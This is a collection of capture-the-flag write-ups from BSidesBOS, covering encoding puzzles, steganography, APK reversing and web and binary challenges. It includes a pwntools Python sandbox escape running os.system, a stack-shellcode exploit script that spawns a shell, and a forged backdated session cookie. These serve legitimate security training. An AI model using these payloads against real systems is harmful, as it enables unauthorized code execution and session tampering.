BSidesBOS CTF Writeups

Challenge name: Read The Rules

Please follow the rules for this CTF!

Connect here: https://bsidesbos.ctf.games/rules

Solution:

Open the link above and inspect the page. The flag is in the page source, so read through all of it.

Flag: flag{its_time_to_hack} 

Challenge name: baseball

I found this baseball… but… it doesn’t look like a baseball?

Download the file baseball

Solution:

The given file contains the following base64 encoded text:

TzRaVUNVMlRNRTRIQTZMSFBGWkdTNVpTSzVZVU1ZSllIQk5ER00zREdKTkhBVTJWSkJHVkNWMllPRlVFSzMyRE9GTUVNMkNaR0Y1RU1VUlpNUlNHS1JSWE9CQ1VVU1pZSk4ySEFWVFVPVTJGQzJDV000WlUyUVNHSlpBVFNNUT0=

base64 decoder: https://www.base64decode.org/

After base64 decoding it we get base32 encoded text; decoding that in turn gives:

w3ASSa8pygyriw2WqFa88Z33c2ZpSUHMQWXqhEoCqXFhY1zFR9ddeF7pEJK8KtpVtu4QhVg3MBFNA92

base32 decoder: https://cryptii.com/pipes/base32

The resulting value is base58 encoded text. Decoding it with a base58 decoder gives the flag.

base58 decoder: https://www.appdevtools.com/base58-encoder-decoder

Flag:

flag{wow_you_hit_a_homerun_and_really_ran_the_bases_there} 
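The three decoding layers above done in code, as an added example that is not part of the writeup: a small base58 decoder plus a loop that picks each next layer by its alphabet. The `wrap()` helper only builds a constructed sample; `peel()` can be fed the challenge string directly.

```python
import base64
import re
B58 = b"123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"

def b58decode(s):
    """Base58 (Bitcoin alphabet) to bytes; each leading '1' is a zero byte."""
    num = 0
    for ch in s.encode():
        if B58.find(ch) < 0:
            raise ValueError("invalid base58 character %r" % ch)
        num = num * 58 + B58.find(ch)
    body = num.to_bytes((num.bit_length() + 7) // 8, "big")
    return b"\x00" * (len(s) - len(s.lstrip("1"))) + body

def b58encode(data):
    """Inverse of b58decode, used only to build the constructed sample below."""
    num, out = int.from_bytes(data, "big"), bytearray()
    while num:
        num, rem = divmod(num, 58)
        out.append(B58[rem])
    return "1" * (len(data) - len(data.lstrip(b"\x00"))) + out[::-1].decode()

# Most restrictive alphabet first: base32 and base58 text usually also match base64.
LAYERS = [
    ("base32", re.compile(r"^[A-Z2-7]+=*$"), base64.b32decode),
    ("base58", re.compile(r"^[1-9A-HJ-NP-Za-km-z]+$"), b58decode),
    ("base64", re.compile(r"^[A-Za-z0-9+/]+=*$"), lambda s: base64.b64decode(s, validate=True)),
]

def peel(text, max_layers=10):
    """Strip nested encodings until a flag appears or nothing decodes to printable
    ASCII; returns (final_text, [layer names]). Alphabet matching is a heuristic."""
    trail, current = [], text.strip()
    while len(trail) < max_layers and not current.startswith("flag{"):
        for name, pattern, decode in LAYERS:
            try:
                decoded = decode(current).decode("ascii") if pattern.match(current) else ""
            except (ValueError, UnicodeDecodeError):
                continue
            if decoded and decoded.isprintable():
                trail.append(name)
                current = decoded
                break
        else:
            break  # no layer matched: innermost payload reached
    return current, trail

def wrap(flag):
    """Constructed sample: base58 -> base32 -> base64, nested like the challenge file."""
    return base64.b64encode(base64.b32encode(b58encode(flag.encode()).encode())).decode()
```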

Challenge name: Kiddie Pool

Look at this new graphic design technique I learned! This is like 900% cool!!!

Download the file below.

https://imgur.com/9F1s7o1

Flag

flag{whirlpool_in_a_cinch}

Solution

In the news: in 2007 police caught a paedophile who had tried to mask his identity with a swirl effect on his face.

https://i2.wp.com/i.imgur.com/9F1s7o1.png?w=770&ssl=1

There are several programs that can do this, including Photoshop, which I don't have. After a bit of searching, a couple of online tools that didn't work, and no luck with GIMP, I came across a Python package called Wand.

https://docs.wand-py.org/en/0.6.3/

I wrote a quick script (see the github writeup link) and, together with the hint "900%", quickly got the flag.

https://i.imgur.com/VRtn7IZ.png

EZ Bake Oven

Do you like baking? Don’t leave the oven on for too long!

Open the Deployment tab to start this challenge.

Flag

flag{you_are_the_master_baker}

Solution

Clicking on the Deployment tab spins up an instance for us:

http://challenge.ctf.games:32575/

Navigating to the given site presents us with: https://i.imgur.com/3uuO8Pz.png

The last option, "magic cookies", sounds interesting. I started baking; the timer shows nearly 120 hours. No, that won't do.

After poking around in the browser's developer tools, I noticed that a cookie was set. Base64 decoding it shows that the start time is stored in the cookie, and every second the JavaScript checks how much time is left. If we could change the cookie…

Off to Burp Suite. Navigate to the site, start baking, turn on intercept and reload the page to capture the cookie. Base64 encode a string of your choice, in this case:

{"recipe": "Magic Cookies", "time": "09/21/2020, 17:23:29"}

which is roughly 120 hours ago. Submit the altered request and, when the site reloads, success: https://i.imgur.com/Ajzi0q6.png
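The cookie format above reproduced in Python, as an added example that is not part of the challenge or the writeup: `backdated_cookie()` builds the same backdated JSON blob, `is_done()` models the server trusting it, and `sign_cookie()`/`verify_cookie()` show the hardened variant where an HMAC (key name and secret are constructed) makes an edited start time fail verification.

```python
import base64
import hashlib
import hmac
import json
from datetime import datetime, timedelta

TIME_FMT = "%m/%d/%Y, %H:%M:%S"  # timestamp layout seen in the challenge cookie

def make_cookie(recipe, started):
    """Build the cookie the way the challenge does: base64 over a JSON blob."""
    payload = {"recipe": recipe, "time": started.strftime(TIME_FMT)}
    return base64.b64encode(json.dumps(payload).encode()).decode()

def backdated_cookie(recipe, hours, now):
    """A cookie whose start time lies `hours` in the past, so the oven timer reads done."""
    return make_cookie(recipe, now - timedelta(hours=hours))

def parse_cookie(cookie):
    return json.loads(base64.b64decode(cookie))

def is_done(cookie, bake_hours, now):
    """The challenge's trust model: the start time is whatever the client sent."""
    started = datetime.strptime(parse_cookie(cookie)["time"], TIME_FMT)
    return now - started >= timedelta(hours=bake_hours)

# Hardened variant (constructed, not from the challenge): same cookie layout, but an
# HMAC over it means a start time edited on the client is rejected, not believed.
def sign_cookie(cookie, key):
    tag = hmac.new(key, cookie.encode(), hashlib.sha256).hexdigest()
    return cookie + "." + tag  # base64 never contains '.', so it is a safe separator

def verify_cookie(signed, key):
    """Return the payload only when the tag matches; None for anything tampered."""
    cookie, sep, tag = signed.rpartition(".")
    if not sep:
        return None
    expected = hmac.new(key, cookie.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(tag, expected):
        return None
    return parse_cookie(cookie)

def is_done_signed(signed, key, bake_hours, now):
    """Timer check that only honours a start time the server itself signed."""
    payload = verify_cookie(signed, key)
    if payload is None:
        return False
    started = datetime.strptime(payload["time"], TIME_FMT)
    return now - started >= timedelta(hours=bake_hours)
```

Signing stops edits but not replay of an old signed cookie; keeping the start time server-side removes the client from the decision entirely.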

Challenge name: y2k

They told us the world was going to end in the year 2000! But it didn’t… when will the world end?

Solution:

Connecting to the instance and playing around with it, we deduced from the error messages returned on invalid input that this was a Python sandbox challenge. My plan was to get access to the os module and call its system function.

from pwn import *

# connect to the challenge instance and read the prompt
p = remote('challenge.ctf.games', 31656)
print(p.recv())
# pull in os via __import__ and run a command (pwntools expects bytes on Python 3)
p.sendline(b"__import__('os').system('cat flag.txt')")
print(p.recv())

Flag: flag{we_are_saved_from_py2_k}

Challenge name: mobility

Always wanted to calculate HMACs on your phone? Check out our new app! It supports 6 different algorithms.

Solution:

We are given an APK which we need to reverse. I simply decompiled it with jadx-gui and examined the code in MainActivity.java. It is a program that calculates the HMAC of user input. There is an interesting array of easily recognizable decimal values, the first four of which are the ASCII codes for 'flag'. Translating the contents of this array gives us the flag.

Flag: flag{classic_apk_decompile_shenanigans}

seashells

Can you collect all the shells?

Solution:

Baby pwn challenge for this CTF. Running it for the first time, we receive what looks like a stack address; we can verify this by checking the memory mappings in gdb. Since all protections are off, we can do the classic shellcode-on-the-stack trick and redirect control flow to the given stack address (which is the address of the buffer holding our input).

from pwn import *

context.arch = 'amd64'

p = process('./seashells')
#p = remote('challenge.ctf.games', 32134)
#gdb.attach(p, 'break *main')

# the first line the binary prints is the address of our input buffer on the stack
leak = int(p.recvuntil(b'\n'), 16)
print('[*] stack leak: {}'.format(hex(leak)))

# shellcode first, padded out to the saved return address, then the leaked address on top
exploit = asm(shellcraft.sh())
exploit += b'\x00' * (136 - len(exploit))
exploit += p64(leak)

print(p.recv())
p.sendline(exploit)
print(p.recv())
p.interactive()

Flag: flag{popping_shells_by_the_sea_shore}

Saving the World

Sometimes I dream of saving the world. Saving everyone from the invisible hand, the one that brands us with an employee badge, the one that forces us to work for them, the one that controls us every day without us knowing it. But I can’t stop it. I’m not that special. I’m just anonymous. I’m just alone.

[Download the file — see github]

Flag

flag{take_care_of_whiterose}

Solution

Download the file and open it to view. It looks like an ad with some interesting numbers, which looked like letter indices, A=1 .. Z=26.

6 2 26 8 16 21 17 18 3 18 1 17 6 8 3 2 1 14 5 18 17 10 21 18 18 25 15 14 5 5 2 10 20 25 14 13 18 17 10 22 7 21 5 14 22 1 10 14 7 18 5 15 18 6 22 17 18 7 21 18 10 21 22 7 18 16 21 22 16 24 18 1 6 7 21 18 3 14 6 6 10 2 5 17 22 6 7 10 18 25 25 22 16 24 25 2 6 18 6 16 7 2

But decoded it didn’t look like much…

fbzhpuqrcraqfhcbanerqjurryoneebjtynmrqjvguenvajngreorfvqrgurjuvgrpuvpxrafgurcnffjbeqvfgjryyvpxybfrfpgb

Tried a couple of things like XOR and subtraction. Ended up on ROT13:

somuchdependsuponaredwheelbarrowglazedwithrainwaterbesidethewhitechickensthepasswordistwellicklosescto

Cleaned up, this reads “so much depends upon a red wheel barrow glazed with rain water beside the white chickens the password is twellicklosescto”

Password? Interesting. Let’s see what steghide has to say:

[email protected]:~/Desktop$ steghide --info menu.jpg 
"menu.jpg":
  format: jpeg
  capacity: 6.5 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase: 
  embedded file "flag.txt":
    size: 29.0 Byte
    encrypted: rijndael-128, cbc
    compressed: yes

Embedded file? Extract it, please:

[email protected]:~/Desktop$ steghide extract -sf menu.jpg -p twellicklosescto 
wrote extracted data to "flag.txt".

Open the file and get your flag.
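The number-to-letter and ROT13 steps of this solution in code, as an added example that is not part of the writeup; `NUMBERS` is the sequence copied from the menu image above, and `find_shift()` generalizes the ROT13 guess by trying every shift against the crib "password".

```python
import string

# Number sequence read off the menu image, copied from the writeup above.
NUMBERS = ("6 2 26 8 16 21 17 18 3 18 1 17 6 8 3 2 1 14 5 18 17 10 21 18 18 25 15 14 5 5 2 10 "
           "20 25 14 13 18 17 10 22 7 21 5 14 22 1 10 14 7 18 5 15 18 6 22 17 18 7 21 18 10 21 "
           "22 7 18 16 21 22 16 24 18 1 6 7 21 18 3 14 6 6 10 2 5 17 22 6 7 10 18 25 25 22 16 "
           "24 25 2 6 18 6 16 7 2")

def a1z26_decode(text):
    """Map 1..26 to a..z; a value outside that range is an error rather than skipped."""
    letters = []
    for tok in text.split():
        n = int(tok)
        if not 1 <= n <= 26:
            raise ValueError("%d is not a letter index" % n)
        letters.append(string.ascii_lowercase[n - 1])
    return "".join(letters)

def rot_n(text, shift):
    """Caesar shift of lowercase letters; shift 13 is ROT13, which is its own inverse."""
    return "".join(chr((ord(c) - 97 + shift) % 26 + 97) if c.islower() else c for c in text)

def find_shift(text, crib="password"):
    """Every shift whose output contains the crib, for when ROT13 is only a guess."""
    return [k for k in range(26) if crib in rot_n(text, k)]

def extract_password(plaintext):
    """The plaintext ends 'the password is <pw>' without spaces; return the trailing token."""
    marker = "thepasswordis"
    idx = plaintext.rfind(marker)
    if idx < 0:
        raise ValueError("password marker not found")
    return plaintext[idx + len(marker):]
```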
